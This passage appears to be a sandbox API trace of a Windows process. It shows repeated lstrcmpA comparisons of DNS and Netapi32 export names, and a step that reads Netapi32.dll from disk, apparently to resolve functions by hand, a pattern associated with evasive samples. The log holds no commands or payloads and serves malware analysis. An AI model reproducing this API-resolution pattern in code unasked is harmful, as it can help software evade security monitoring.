(lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0094.812] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0094.812] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0094.813] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.813] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0094.814] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0094.815] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0094.815] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0094.815] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0094.815] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0094.815] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0094.815] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0094.815] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0094.815] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0094.816] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0094.825] GetProcessHeap () returned 0x570000 [0094.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3aed010 | out: hHeap=0x570000) returned 1 [0094.826] GetProcessHeap () returned 0x570000 [0094.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5890a0 [0094.826] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0094.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0094.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0094.828] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0094.828] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0094.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0094.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0094.829] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0094.829] GetProcessHeap () returned 0x570000 [0094.829] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13b00) returned 0x2db5030 [0094.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0094.829] ReadFile (in: hFile=0x17c, lpBuffer=0x2db5030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db5030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0094.829] CloseHandle (hObject=0x17c) returned 1 [0094.829] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0094.830] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0094.831] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0094.832] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0094.832] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0094.833] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", 